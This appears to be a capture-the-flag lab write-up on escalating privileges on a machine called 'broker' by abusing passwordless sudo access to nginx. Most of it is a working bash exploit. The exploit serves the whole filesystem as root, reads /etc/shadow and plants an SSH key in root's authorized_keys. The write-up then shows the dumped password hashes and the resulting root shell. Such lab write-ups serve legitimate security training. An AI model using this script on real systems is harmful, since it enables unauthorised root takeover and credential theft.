nginx

The compromised activemq account has been identified for its sudo privileges to execute nginx without getting prompted for password.

Enabling a user to execute web server applications such as nginx with sudo represents a significant security lapse. This misconfiguration permits the mounting of the entire filesystem as a web server, effectively granting unauthorized access to all system resources.

In the event of a successful compromise, the attacker gains complete control over the target system, with the ability to manipulate, exfiltrate, or destroy sensitive data. The utilization of sudo privileges to execute nginx in this context drastically amplifies the impact of the breach, providing a means for unauthorized control and exploitation. This vulnerability poses an imminent threat to the confidentiality, integrity, and availability of the target system.

#!/bin/bash
echo "[+] making config"
cat <<EOF >/tmp/nginx.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 1234;
}
http {
server {
    listen 8888;
    root /;
    autoindex on;
    dav_methods PUT;
}
}
EOF
echo "[+] Launching..."
sudo -u root /usr/sbin/nginx -c /tmp/nginx.conf
echo "[+] Reading /etc/shadow..."
curl http://localhost:8888/etc/shadow
echo "[+] Writing to /root/.ssh/authorized_keys..."
curl -x put http://localhost:8888/root/.ssh/authorized_keys -d 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali'

The above simple bash script performs the following actions;

generates an nginx configuration file
- hosting the entire filesystem over the port 8888 for read access
- with a support to handle put requests for write access
starts an nginx web server with the aforementioned configuration file as the root user
confirms the read access to the /etc/shadow file
confirms the write access by writing kali’s ssh public key to the authorized_keys file of the root user via the put request

Given the target system allows the root user for SSH access, it is very likely that the SSH directory and/or the authorized_keys file already exist

activemq@broker:/tmp$ ./pe.sh 
[+] making config
[+] Launching...
[+] Reading /etc/shadow...
root:$y$j9T$S6NkiGlTDU3IUcdBZEjJe0$sSHRUiGL/v4FZkWjU.HZ6cX2vsMY/rdFBTt25LbGxf1:19666:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
sys:*:19405:0:99999:7:::
sync:*:19405:0:99999:7:::
games:*:19405:0:99999:7:::
man:*:19405:0:99999:7:::
lp:*:19405:0:99999:7:::
mail:*:19405:0:99999:7:::
news:*:19405:0:99999:7:::
uucp:*:19405:0:99999:7:::
proxy:*:19405:0:99999:7:::
www-data:*:19405:0:99999:7:::
backup:*:19405:0:99999:7:::
list:*:19405:0:99999:7:::
irc:*:19405:0:99999:7:::
gnats:*:19405:0:99999:7:::
nobody:*:19405:0:99999:7:::
_apt:*:19405:0:99999:7:::
systemd-network:*:19405:0:99999:7:::
systemd-resolve:*:19405:0:99999:7:::
messagebus:*:19405:0:99999:7:::
systemd-timesync:*:19405:0:99999:7:::
pollinate:*:19405:0:99999:7:::
sshd:*:19405:0:99999:7:::
syslog:*:19405:0:99999:7:::
uuidd:*:19405:0:99999:7:::
tcpdump:*:19405:0:99999:7:::
tss:*:19405:0:99999:7:::
landscape:*:19405:0:99999:7:::
fwupd-refresh:*:19405:0:99999:7:::
usbmux:*:19474:0:99999:7:::
lxd:!:19474::::::
activemq:$y$j9T$5eMce1NhiF0t9/ZVwn39P1$pCfvgXtARGXPYDdn2AVdkCnXDf7YO7He/x666g6qLM5:19666:0:99999:7:::
_laurel:!:19667::::::
[+] Writing to /root/.ssh/authorized_keys...

Complete

┌──(kali㉿kali)-[~/archive/htb/labs/broker]
└─$ ssh root@$IP                                                                                                                  130 ⨯
enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
  system information as of thu dec 14 01:25:43 AM UTC 2023
 
  system load:           0.00244140625
  usage of /:            87.4% of 4.63GB
  memory usage:          24%
  swap usage:            0%
  processes:             193
  users logged in:       1
  ipv4 address for eth0: 10.10.11.243
  ipv6 address for eth0: dead:beef::250:56ff:feb9:21e9
 
  => / is using 87.4% of 4.63GB
 
 
Expanded Security Maintenance for Applications is not enabled.
 
0 updates can be applied immediately.
 
Enable ESM Apps to receive additional future security updates.
see https://ubuntu.com/esm or run: sudo pro status
 
 
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
root@broker:~# whoami
root
root@broker:~# hostname
broker
root@broker:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.243  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:21e9  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:21e9  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:21:e9  txqueuelen 1000  (Ethernet)
        RX packets 1419404  bytes 209446608 (209.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1490170  bytes 668635230 (668.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 5494507  bytes 843368356 (843.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5494507  bytes 843368356 (843.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

InfoSec LAB

Explorer

Broker_Privilege_Escalation

nginx

Interactive Graph View

Backlinks